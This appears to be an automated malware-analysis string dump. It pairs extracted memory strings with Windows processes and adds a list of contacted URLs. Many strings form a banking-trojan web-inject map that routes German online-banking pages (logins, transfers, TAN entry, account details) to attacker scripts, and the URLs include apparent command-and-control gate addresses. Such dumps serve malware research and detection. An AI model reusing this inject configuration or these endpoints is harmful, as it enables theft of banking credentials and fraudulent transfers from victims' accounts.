art.js@%SERV1%/scheck.php?target=POST&id=start\|pbueberweisung.js@%SERV1%/scheck.php?target=POST&id=ueberweisung\|pbuliste.js@%SERV1%/scheck.php?target=POST&id=uliste\|pbumsatz.js@%SERV1%/scheck.php?target=POST&id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	winlogon.exe, msdtc.exe
Export the feeds to %s	iexplore.exe
&gHo%E-UH	skhfushjflw.exe, 7db482f5469dfeb0a6b2b4f66c062314.exe, config.bin.dr
\|get.php@%SERV1%/get.ph	explorer.exe, wscntfy.exe
%SystemRoot%\system32\SHELL32.dll	iexplore.exe
%s%03d.tmp	iexplore.exe
%s bytes	iexplore.exe
ung.js###%SERV1%/scheck.php?target=SPARK&id=sepaueberweisung	iexplore.exe
$5)}%cr\	explorer.exe
Expected '@end'%Conditional compilation is turned off	iexplore.exe
@log.php###%SERV1%/log.php	iexplore.exe
anlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	iexplore.exe
ntrag.js###%SERV1%/scheck.php?target=SPARK&id=uebereintrag	iexplore.exe
%sTitle: %s	iexplore.exe
[ERROR] : Thread is really sloppy : dwErr == %d	iexplore.exe
@spfinanzstatus.js###%SERV1%/scheck.php?target=SPARK&id=finanzstatus	lsass.exe
@@spkontodetails.js###%SERV1%/scheck.php?target=SPARK&id=kontodetails	iexplore.exe
\%E.e5:	explorer.exe
@@sp_sepaueberweisung.js###%SERV1%/scheck.php?target=SPARK&id=_sepaueberweisung	iexplore.exe
Open in new tab (Ctrl+Enter)%Open '%s' in a tab group (Ctrl+Enter)	iexplore.exe
WISP - %s	iexplore.exe
%s?%s&%s	explorer.exe
eberweisung.js###%SERV1%/scheck.php?target=SPARK&id=sepaueberweisung	MDM.EXE
ALOG: Setup successful installing: %s to %s destination code(%lx)	iexplore.exe
@@pbtanhist.js###%SERV1%/scheck.php?target=POST&id=tanhist	iexplore.exe
weisung.js###%SERV1%/scheck.php?target=SPARK&id=euueberweisung	spoolsv.exe
This is the new setting suggested by %s	iexplore.exe
berfrage.js@%SERV1%/scheck.php?target=SPARK&id=euueberfrage\|	ctfmon.exe
http://www.%s.com Launch Internet Explorer Browser Launch Internet Explorer Browser	iexplore.exe
%d,%d,%d,%d	iexplore.exe
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0x%08X; dwCrc32 == 0x%08X : dwErr == %d	iexplore.exe
%systemroot%\Registration	iexplore.exe
@@dbinlanderr.js###%SERV1%/scheck.php?target=DB&id=inlanderr	iexplore.exe
@@pbumsatz.js###%SERV1%/scheck.php?target=POST&id=umsatz	iexplore.exe
@@spanfang.js###%SERV1%/scheck.php?target=SPARK&id=anfang	iexplore.exe
%s File	iexplore.exe
Drive %c cannot be accessed.	iexplore.exe
OWRN: OBJECT tags for CLASSID=%lx... have mixed usage with CODEBASE=%ws and %ws	iexplore.exe
P%S%V%Y%\%	iexplore.exe
#%SERV1%/scheck.php?target=SPARK&id=euueberweisung	svchost.exe
@@speuueberfrage.js###%SERV1%/scheck.php?target=SPARK&id=euueberfrage	iexplore.exe
%SERV1%/sch6	iexplore.exe
pic.jpg###%SERV1%/fgetpic.php?id=	iexplore.exe
@@spanfang.js###%SERV1%/scheck.php?tar	svchost.exe
@@pbstart.js###%SERV1%/scheck.php?tar	iexplore.exe
t=SPARK&id=sepauebereintrag\|spsepaueberfrage.js@%SERV1%/scheck.php?target=SPARK&id=sepaueberfrage\|spsepaueberweisung.js@%SERV1%/scheck.php?target=SPARK&id=sepaueberweisung\|spuebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=uebereintrag\|spueberfrage.js@	ctfmon.exe
SOFTWARE\Microsoft\CTF\TIP\%s\LanguageProfile\0x%08X\%s	iexplore.exe
%%%FFFFFFFiiiiii	iexplore.exe
6Im%g7	explorer.exe
%%%FFFF	iexplore.exe
%Opens a new Internet Explorer window./Adds the current page to your Favorites folder.&Previews how this document will print.*Prints the document in the selected frame.	iexplore.exe
@@dbinland.js###%SERV1%/scheck.php?target=DB&id=inland	iexplore.exe
%ld sites	iexplore.exe
Label not found6'default' can only appear once in a 'switch' statement%Expected identifier, string or number	iexplore.exe
/Z%D,3	iexplore.exe
%s Feed %d	iexplore.exe
@@spumsatz.js###%SERV1%/scheck.php?target=SPARK&id=umsatz	iexplore.exe
Pages visited at %s	iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d	iexplore.exe
Redirecting to site: %s	iexplore.exe
@@speuuebereintrag.js###%SERV1%/scheck.php?target=SPARK&id=euueber	jqs.exe
%SERV1%/fpstore.php	iexplore.exe
arget=POST&id=login\|pbstart.js@%SERV1%/scheck.php?target=POST&id=start\|pbueberweisung.js@%SERV1%/scheck.php?target=POST&id=ueberweisung\|pbuliste.js@%SERV1%/scheck.php?target=POST&id=uliste\|pbumsatz.js@%SERV1%/scheck.php?target=POST&id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	svchost.exe
@@speuueberfrage.js###%S	dllhost.exe
Import the cookies from %s	iexplore.exe
DragDrop%lx	iexplore.exe
(Default for %s Accelerator)jThis Accelerator runs code. To remove this Accelerator, please try Remove Programs from the Control Panel.	iexplore.exe
Open '%s' in a new tab	iexplore.exe
\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	lsass.exe
@%SERV1%/get.php\|getrez.php@%SERV1%/getrez.php\|put.php@%SERV1%/put.php\|log.php@%SERV1%/log.php\|dump.php@%SERV1%/dump.php\|captcha.php@%SERV1%/fcaptcha.php\|captcha2.php@%SERV1%/fcaptcha2.php\|fiscript.js@%SERV1%/scheck.php?target=FIDU&id=main\|fiscript2.js@%SERV1%/scheck.php?target=FIDU&id=main2\|https.html@%SERV1%/scheck.php?target=CMN&id=https\|dbcommon.js@%SERV1%/scheck.php?target=DB&id=common\|dbhistory.js@%SERV1%/scheck.php?target=DB&id=history\|dbinland.js@%SERV1%/scheck.php?target=DB&id=inland\|dbinlandconfirm.js@%SERV1%/scheck.php?target=DB&id=inlandconfirm\|dbinlanderr.js@%SERV1%/scheck.php?target=DB&id=inlanderr\|dbitanauth.js@%SERV1%/scheck.php?target=DB&id=itanauth\|dbmain.js@%SERV1%/scheck.php?target=DB&id=main\|dbpresepa.js@%SERV1%/scheck.php?target=DB&id=presepa\|dbsepa.js@%SERV1%/scheck.php?target=DB&id=sepa\|dbsepaconfirm.js@%SERV1%/scheck.php?target=DB&id=sepaconfirm\|dbsepaerr.js@%SERV1%/scheck.php?target=DB&id=sepaerr\|spanfang.js@%SERV1%/scheck.php?target=SPARK&id=anfang\|spcommon.js@%SERV1%/scheck.php?target=SPARK&id=common\|speuuebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=euuebereintrag\|speuueberfrage.js@%SERV1%/scheck.php?target=SPARK&id=euueberfrage\|speuueberweisung.js@%SERV1%/scheck.php?target=SPARK&id=euueberweisung\|spfinanzstatus.js@%SERV1%/scheck.php?target=SPARK&id=finanzstatus\|spkontodetails.js@%SERV1%/scheck.php?target=SPARK&id=kontodetails\|splogin.js@%SERV1%/scheck.php?target=SPARK&id=login\|spsepauebereintrag.js@%SERV1%/scheck.php?targ	ctfmon.exe
@@spueberfrage.js###%SERV1%/scheck.php?target=SPARK&id=ueberfrage	iexplore.exe
\|fpic.jpg@%SERV1%/fgetpic.php?id=\|	iexplore.exe
@@sp_euueberweisung.js###%SERV1%/scheck.php?target=SPARK&i	spoolsv.exe
todetails.js###%SERV1%/scheck.php?target=SPARK&id=kontodetails	jqs.exe
CPenIMX(sketch)::EditInk(%s)	iexplore.exe
%d Weeks Ago	iexplore.exe
@@dbsepaconfirm.js###%SERV1%/scheck.php?target=DB&id=sepaconfirm	iexplore.exe
%OLE32.DLL	iexplore.exe
%u hour ago	iexplore.exe
%s (Default)	iexplore.exe
E&dit with %s	iexplore.exe
%u minutes ago	iexplore.exe
\|get.php@%SERV1%/get.php\|getrez.php@%SERV1%/getrez.php\|put.php@%SERV1%/put.php\|log.php@%SERV1%/log.php\|dump.php@%SERV1%/dump.php\|captcha.php@%SERV1%/fcaptcha.php\|captcha2.php@%SERV1%/fcaptcha2.php\|fiscript.js@%SERV1%/scheck.php?target=FIDU&id=main\|fiscript2.js@%SERV1%/scheck.php?target=FIDU&id=main2\|https.html@%SERV1%/scheck.php?target=CMN&id=https\|dbcommon.js@%SERV1%/scheck.php?target=DB&id=common\|dbhistory.js@%SERV1%/scheck.php?target=DB&id=history\|dbinland.js@%SERV1%/scheck.php?target=DB&id=inland\|dbinlandconfirm.js@%SERV1%/scheck.php?target=DB&id=inlandconfirm\|dbinlanderr.js@%SERV1%/scheck.php?target=DB&id=inlanderr\|dbitanauth.js@%SERV1%/scheck.php?target=DB&id=itanauth\|dbmain.js@%SERV1%/scheck.php?target=DB&id=main\|dbpresepa.js@%SERV1%/scheck.php?target=DB&id=presepa\|dbsepa.js@%SERV1%/scheck.php?target=DB&id=sepa\|dbsepaconfirm.js@%SERV1%/scheck.php?target=DB&id=sepaconfirm\|dbsepaerr.js@%SERV1%/scheck.php?target=DB&id=sepaerr\|spanfang.js@%SERV1%/scheck.php?target=SPARK&id=anfang\|spcommon.js@%SERV1%/scheck.php?target=SPARK&id=common\|speuuebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=euuebereintrag\|speuueberfrage.js@%SERV1%/scheck.php?target=SPARK&id=euueberfrage\|speuueberweisung.js@%SERV1%/scheck.php?target=SPARK&id=euueberweisung\|spfinanzstatus.js@%SERV1%/scheck.php?target=SPARK&id=finanzstatus\|spkontodetails.js@%SERV1%/scheck.php?target=SPARK&id=kontodetails\|splogin.js@%SERV1%/scheck.php?target=SPARK&id=login\|spsepauebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=sepauebereintrag\|spsepaueberfrage.js@%SERV1%/scheck.php?target=SPARK&id=sepaueberfrage\|spsepaueberweisung.js@%SERV1%/scheck.php?target=SPARK&id=sepaueberweisung\|spuebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=uebereintrag\|spueberfrage.js@	iexplore.exe
,Select which folder you want to export from.+Where do you want to export your favorites?7Select where you would like your favorites exported to..Where do you want to import your cookies from?8You can select where we should import your cookies from.)Where do you want to export your cookies?6You can select where we should export your cookies to.-%s already exists.	iexplore.exe
@@spkontodetails.js###%SERV1%/scheck.php?target=SPARK&id=kontodeta	iexplore.exe
@@spuebereintrag.js###%SERV1%/scheck.php?target=SPARK&id=uebereintrag	iexplore.exe
ovenext.js###%SERV1%/scheck.php?target=POST&id=movenext	svchost.exe
%O*@hv#	iexplore.exe
%i50]b	skhfushjflw.exe.dr
@@spueberweisung.js###%SERV1%/scheck.php?target=SPARK&id=ueberweisung	iexplore.exe
CPenIMX::_DIMCallback(%s,%08X,%08X,...)	iexplore.exe
##%SERV1%/scheck.php?target=POST&id=goodtan	wmiprvse.exe
zqnj%SNT	ROUTER.dr
(%d bytes)	iexplore.exe
Insert a disk, and then try again.EThe disk in drive %c is not formatted.	iexplore.exe
SERV1%/scheck.php?target=POST&id=start\|pbueberweisung.js@%SERV1%/scheck.php?target=POST&id=ueberweisung\|pbuliste.js@%SERV1%/scheck.php?target=POST&id=uliste\|pbumsatz.js@%SERV1%/scheck.php?target=POST&id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	alg.exe
This item expired %s	iexplore.exe
%sComments: %s	iexplore.exe
Downloading from site: %s	iexplore.exe
%SystemRoot%\system32\rsvpsp.dll	iexplore.exe
Importing: %s	iexplore.exe
_.DI=function(e){this.element=e;this.B=[];this.M=_.p;"ab_opt"==this.element.id&&0==this.element.childNodes.length&&window.gbar.aomc(this.element);for(var e=(0,_.Qc)(".ab_dropdownitem",this.element),a=0,b;b=e[a];a++)(0,_.Gd)(b,"disabled")\|\|this.B.push(b)};_.EI=function(e,a){e.IB(e.M==_.p?a?0:e.B.length-1:(e.M+(a?1:e.B.length-1))%e.B.length)};	rs=AItRSTPlPDh3JqT4hZcG--RlbldBDxGPAA[1].dr
@@spueberfrage.js###%SERV1%/scheck.php?target=SPARK&id=ueber	dllhost.exe
erJ `%I"	svchost.exe, iexplore.exe
:LOG: Downloaded images must now be all x86 code, URL:(%s)	iexplore.exe
var L_ACR_Title_TEXT = "We were unable to return you to %s.";	iexplore.exe
@@dbmain.js###%SERV1%/scheck.php?target=DB&id=main	iexplore.exe
@@spkontodetails.js###%SERV1%/scheck.p	dllhost.exe
Compatibility View(%s is now running in Compatibility View.	iexplore.exe
?Are you sure you want to import '%ls' to your Favorites folder?8Are you sure you want to export your Favorites to '%ls'?aFavorites cannot be imported because modification of favorites on this machine has been disabled.HThe Import/Export Wizard has been disabled by your system administrator.@Select Folder to Import Bookmarks	iexplore.exe
K%f"Vl	iexplore.exe
%1!s!, %2!s!%Do you want to run or save this file?	iexplore.exe
%d.%d.%d	iexplore.exe
CPenIMX(sketch)::ActivateUI(...); GetTipWantsToBeVisible()=%s _GetOnOff=%s this->bCanGetIC()=%s.	iexplore.exe
%d%% complete.CThe webpage could not be saved because one of its files is missing.	iexplore.exe
epauebereintrag.js###%SERV1%/scheck.php?target=SPARK&id=sepauebereintrag	explorer.exe, wscntfy.exe
%SHIMENG.DLL	iexplore.exe
ebereintrag\|spsepaueberfrage.js@%SERV1%/scheck.php?target=SPARK&id=sepaueberfrage\|spsepaueberweisung.js@%SERV1%/scheck.php?target=SPARK&id=sepaueberweisung\|spuebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=uebereintrag\|spueberfrage.js@	explorer.exe, wscntfy.exe
KLOG: Download OnStopBinding called (hrStatus = %lx / hrResponseHdr = %lx).	iexplore.exe
%SystemRoot%\System32\winrnr.dll	iexplore.exe
%SystemRoot%\system32\mswsock.dll	iexplore.exe
VWRN: File %s was installed, but will require a reboot for the install to take effect.	iexplore.exe
@captcha2.php###%SERV1%/fcaptcha2.php	iexplore.exe
@@splogin.js###%SERV1%/s	spoolsv.exe
Start downloading component %s	iexplore.exe
eberweisung.js###%SERV1%/scheck.php?target=SPARK&id=euueberweisung	winlogon.exe, svchost.exe
@@fiscript.js###%SERV1%/scheck.php?target=FIDU&id=main	iexplore.exe
;ERR: Error installing Java Package. Error Code (hr) = %lx.	iexplore.exe
@@pbstart.js###%SERV1%/scheck.php?target=POST&id=start	iexplore.exe
@@spsepaueberweisung.js###%SERV1%/scheck.php?target=SPARK&id=sepaueberweisung	iexplore.exe
@@@fpic.jpg###%SERV1%/fgetpic.php?id=	iexplore.exe
Open all items (%u new)	iexplore.exe
HTTP/%d.%d	iexplore.exe
$Vu%Pm	skhfushjflw.exe.dr
+Go to "%s" (Alt+Enter to open in a new tab)	iexplore.exe
re = /%s/g;	iexplore.exe
Filter by %s:jAre you sure you want to delete this feed item?	iexplore.exe
(s) (AC:3C) [09:36:44:546]: Executing op: FeaturePublish(Feature=FT_VC_Redist_MFC_x86,Parent=VC_Redist_12222_x86_enu,Absent=2,Component=-EnVx*}4B8{{l=gZ@m1kI@yCj'brE4q0LDoYL~fX^+NYK4w?(7+e=i(MTt%-g[m0%C!}L5O6hxDf?@'NMrNuGte}T4$fobOP4@MM~NpMp$[Dm4HGyYz=3~&x)	msiexec.exe
@@dbhistory.js###%SERV1%/scheck.php?target=DB&id=history	iexplore.exe
@@spcommon.js###%SERV1%/scheck.php?target=SPARK&id=common	iexplore.exe
Open '%s' in a background tab	iexplore.exe
@@sp_euueberweisung.js###%SERV1%/scheck.php?target=SPARK&id=_euueberweisung	iexplore.exe
@@dbinlandconfirm.js###%SERV1%/scheck.php?target=DB&id=inlandconfirm	iexplore.exe

URLs
String value	Source
http://%s.com	iexplore.exe
http://amazon.fr/	iexplore.exe
http://api.bing.com/qsml.aspx?query=	iexplore.exe
http://api.search.live.com/qsml.aspx?query=	iexplore.exe
http://ariadna.elmundo.es/	iexplore.exe
http://ariadna.elmundo.es/favicon.ico	iexplore.exe
http://arianna.libero.it/	iexplore.exe
http://arianna.libero.it/favicon.ico	iexplore.exe
http://asp.usatoday.com/	iexplore.exe
http://asp.usatoday.com/favicon.ico	iexplore.exe
http://auone.jp/favicon.ico	iexplore.exe
http://auto.search.msn.com/response.asp?mt=	iexplore.exe
http://books.google.fr/bkshp?hl=fr&tab=wp	iexplore.exe, google_fr[1].txt.dr
http://br.search.yahoo.com/	iexplore.exe
http://browse.guardian.co.uk/	iexplore.exe
http://browse.guardian.co.uk/favicon.ico	iexplore.exe
http://busca.buscape.com.br/	iexplore.exe
http://busca.buscape.com.br/favicon.ico	iexplore.exe
http://busca.estadao.com.br/favicon.ico	iexplore.exe
http://busca.igbusca.com.br/	iexplore.exe
http://busca.igbusca.com.br//app/static/images/favicon.ico	iexplore.exe
http://busca.orange.es/	iexplore.exe
http://busca.uol.com.br/	iexplore.exe
http://busca.uol.com.br/favicon.ico	iexplore.exe
http://buscador.lycos.es/	iexplore.exe
http://buscador.terra.com.br/	iexplore.exe
http://buscador.terra.com/	iexplore.exe
http://buscador.terra.com/favicon.ico	iexplore.exe
http://buscador.terra.es/	iexplore.exe
http://buscar.ozu.es/	iexplore.exe
http://buscar.ya.com/	iexplore.exe
http://busqueda.aol.com.mx/	iexplore.exe
http://ca.sia.it/seccli/repository/crl.der0j	iexplore.exe
http://ca.sia.it/secsrv/repository/crl.der0j	iexplore.exe
http://cerca.lycos.it/	iexplore.exe
http://cgi.search.biglobe.ne.jp/	iexplore.exe
http://cgi.search.biglobe.ne.jp/favicon.ico	iexplore.exe
http://clients5.google.com/complete/search?hl=	iexplore.exe
http://cnet.search.com/	iexplore.exe
http://cnweb.search.live.com/	iexplore.exe
http://cnweb.search.live.com/favicon.ico	iexplore.exe
http://corp.naukri.com/	iexplore.exe
http://corp.naukri.com/favicon.ico	iexplore.exe
http://crl.comodo.net/utn-userfirst-hardware.crl0q	iexplore.exe
http://crl.comodoca.com/utn-userfirst-hardware.crl06	iexplore.exe
http://crl.quovadisglobal.com/qvrca2.crl0	iexplore.exe
http://crl.usertrust.com/utn-datacorpsgc.crl0	iexplore.exe
http://crl.usertrust.com/utn-userfirst-clientauthenticationandemail.crl0	iexplore.exe
http://crl.usertrust.com/utn-userfirst-hardware.crl01	iexplore.exe
http://crl.usertrust.com/utn-userfirst-networkapplications.crl0	iexplore.exe
http://crl.usertrust.com/utn-userfirst-object.crl0)	iexplore.exe
http://crl.verisign.com/pca1.1.1.crl0g	iexplore.exe
http://crl.verisign.com/pca2.1.1.crl0g	iexplore.exe
http://crl.verisign.com/pca3.crl	iexplore.exe, 60E31627FDA0A46932B0E5948949F2A5.dr
http://crl.verisign.com/pca3.crl0)	iexplore.exe
http://crl.verisign.com/thawtetimestampingca.crl0	iexplore.exe
http://crl.verisign.com/tss-ca.crl0	iexplore.exe
http://crt.comodoca.com/utnaddtrustserverca.crt0$	iexplore.exe
http://cs.wikipedia.org/	iexplore.exe
http://cs.wikipedia.org/favicon.ico	iexplore.exe
http://cs.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://csc3-2009-2-aia.verisign.com/csc3-2009-2.cer0	iexplore.exe
http://csc3-2009-2-crl.verisign.com/csc3-2009-2.crl	iexplore.exe, 0797C381B2F87EB5A1D5573BD15BA4F4.dr
http://csc3-2009-2-crl.verisign.com/csc3-2009-2.crl0d	iexplore.exe
http://de.search.yahoo.com/	iexplore.exe
http://de.wikipedia.org/	iexplore.exe
http://de.wikipedia.org/favicon.ico	iexplore.exe
http://de.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://download.macromedia.com/pub/shockwave/cabs/flash/	iexplore.exe, rs=AItRSTPlPDh3JqT4hZcG--RlbldBDxGPAA[1].dr
http://en.wikipedia.org/	iexplore.exe
http://en.wikipedia.org/favicon.ico	iexplore.exe
http://en.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://es.ask.com/	iexplore.exe
http://es.search.yahoo.com/	iexplore.exe
http://es.wikipedia.org/	iexplore.exe
http://es.wikipedia.org/favicon.ico	iexplore.exe
http://es.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://esearch.rakuten.co.jp/	iexplore.exe
http://espanol.search.yahoo.com/	iexplore.exe
http://espn.go.com/favicon.ico	iexplore.exe
http://find.joins.com/	iexplore.exe
http://fr.search.yahoo.com/	iexplore.exe
http://fr.wikipedia.org/	iexplore.exe
http://fr.wikipedia.org/favicon.ico	iexplore.exe
http://fr.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://go.microsoft.com/favicon.ico	iexplore.exe
http://go.microsoft.com/fwlink/?l	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=105563	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=120347-http://go.microsoft.com/fwlink/?linkid=1203463read	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=120476	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=121315	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=121792	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=122812hthe	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=124983	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=12658	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=12939	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=134080)search	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=140502	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=50462	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=50893)lear&n	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=54537&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=54729&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=54758	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=54796&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=54896&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=55027&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=55028&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=55107&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=55242&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=55245&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=56297&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=57427&protocol=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=58472&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=58473&clcid=	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=58658	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=66725	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=68928	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=68929	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=69157	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=74005finternet	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=76277	iexplore.exe
http://go.microsoft.com/fwlink/?linkid=99193	iexplore.exe
http://google.pchome.com.tw/	iexplore.exe
http://home.altervista.org/	iexplore.exe
http://home.altervista.org/favicon.ico	iexplore.exe
http://ie.search.yahoo.com/os?command=	iexplore.exe
http://ie8.ebay.com/open-search/output-xml.php?q=	iexplore.exe
http://image.excite.co.jp/jp/favicon/lep.ico	iexplore.exe
http://images.joins.com/ui_c/fvc_joins.ico	iexplore.exe
http://images.monster.com/favicon.ico	iexplore.exe
http://img.atlas.cz/favicon.ico	iexplore.exe
http://img.shopzilla.com/shopzilla/shopzilla.ico	iexplore.exe
http://in.search.yahoo.com/	iexplore.exe
http://it.search.dada.net/	iexplore.exe
http://it.search.dada.net/favicon.ico	iexplore.exe
http://it.search.yahoo.com/	iexplore.exe
http://it.wikipedia.org/	iexplore.exe
http://it.wikipedia.org/favicon.ico	iexplore.exe
http://it.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://ja.wikipedia.org/	iexplore.exe
http://ja.wikipedia.org/favicon.ico	iexplore.exe
http://ja.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://jobsearch.monster.com/	iexplore.exe
http://koilorio.com/rstnax/index.php	iexplore.exe
http://koilorio.com/spioda/gate.php	explorer.exe
http://koilorio.com/spioda/gate.php;300	explorer.exe
http://koilorio.com/spioda/gate.php?guid=5.1.2600	explorer.exe
http://kr.search.yahoo.com/	iexplore.exe
http://list.taobao.com/	iexplore.exe
http://list.taobao.com/browse/search_visual.htm?n=15&q=	iexplore.exe
http://livesearch.msn.co.kr/	iexplore.exe
http://logo.verisign.com/vslogo.gif0	iexplore.exe
http://mail.live.com/	iexplore.exe
http://mail.live.com/?rru=compose%3fsubject%3d	iexplore.exe
http://maps.google.fr/maps?hl=fr&tab=wl	iexplore.exe, google_fr[1].txt.dr
http://maps.live.com/	iexplore.exe
http://maps.live.com/default.aspx	iexplore.exe
http://maps.live.com/geotager.aspx	iexplore.exe
http://msdn.microsoft.com/	iexplore.exe
http://msdn.microsoft.com/workshop/security/privacy/overview/privacyimportxml.asp)	iexplore.exe
http://msdn.microsoft.com/workshop/security/szone/overview/templates.asp)	iexplore.exe
http://msk.afisha.ru/	iexplore.exe
http://news.google.fr/nwshp?hl=fr&tab=wn	iexplore.exe, google_fr[1].txt.dr
http://nl.wikipedia.org/	iexplore.exe
http://nl.wikipedia.org/favicon.ico	iexplore.exe
http://nl.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://ns.adobe.com/exif/1.0/	iexplore.exe
http://ns.adobe.com/ix/1.0/	iexplore.exe
http://ns.adobe.com/pdf/1.3/	iexplore.exe
http://ns.adobe.com/photoshop/1.0/	iexplore.exe
http://ns.adobe.com/tiff/1.0/	iexplore.exe
http://ns.adobe.com/xap/1.0/	iexplore.exe
http://ns.adobe.com/xap/1.0/mm/	iexplore.exe
http://ocnsearch.goo.ne.jp/	iexplore.exe
http://openimage.interpark.com/interpark.ico	iexplore.exe
http://p.zhongsou.com/	iexplore.exe
http://p.zhongsou.com/favicon.ico	iexplore.exe
http://picasaweb.google.fr/home?hl=fr&tab=wq	iexplore.exe, google_fr[1].txt.dr
http://pl.wikipedia.org/	iexplore.exe
http://pl.wikipedia.org/favicon.ico	iexplore.exe
http://pl.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://price.ru/	iexplore.exe
http://price.ru/favicon.ico	iexplore.exe
http://pt.wikipedia.org/	iexplore.exe
http://pt.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://purl.org/dc/elements/1.1/	iexplore.exe
http://purl.org/rss/1.0/modules/content/	iexplore.exe
http://purl.org/rss/1.0/modules/slash/	iexplore.exe
http://recherche.linternaute.com/	iexplore.exe
http://recherche.tf1.fr/	iexplore.exe
http://recherche.tf1.fr/favicon.ico	iexplore.exe
http://rover.ebay.com	iexplore.exe
http://ru.search.yahoo.com	iexplore.exe
http://ru.wikipedia.org/	iexplore.exe
http://ru.wikipedia.org/favicon.ico	iexplore.exe
http://ru.wikipedia.org/w/api.php?action=opensearch&format=xml&search=	iexplore.exe
http://sads.myspace.com/	iexplore.exe
http://schema.org/webpage	iexplore.exe, google_fr[1].txt.dr
http://schemas.microsoft.com/office/2004/12/omml	iexplore.exe
http://search-dyn.tiscali.it/	iexplore.exe
http://search.about.com/	iexplore.exe
http://search.alice.it/	iexplore.exe
http://search.alice.it/favicon.ico	iexplore.exe
http://search.aol.com/	iexplore.exe
http://search.aol.in/	iexplore.exe
http://search.atlas.cz/	iexplore.exe
http://search.auction.co.kr/	iexplore.exe
http://search.auone.jp/	iexplore.exe
http://search.books.com.tw/	iexplore.exe
http://search.books.com.tw/favicon.ico	iexplore.exe
http://search.centrum.cz/	iexplore.exe
http://search.centrum.cz/favicon.ico	iexplore.exe
http://search.chol.com/	iexplore.exe
http://search.chol.com/favicon.ico	iexplore.exe
http://search.cn.yahoo.com/	iexplore.exe
http://search.daum.net/	iexplore.exe
http://search.daum.net/favicon.ico	iexplore.exe
http://search.dreamwiz.com/	iexplore.exe
http://search.dreamwiz.com/favicon.ico	iexplore.exe
http://search.ebay.co.uk/	iexplore.exe
http://search.ebay.com/	iexplore.exe
http://search.ebay.com/favicon.ico	iexplore.exe
http://search.ebay.de/	iexplore.exe
http://search.ebay.es/	iexplore.exe
http://search.ebay.fr/	iexplore.exe
http://search.ebay.in/	iexplore.exe
http://search.ebay.it/	iexplore.exe
http://search.empas.com/	iexplore.exe
http://search.empas.com/favicon.ico	iexplore.exe
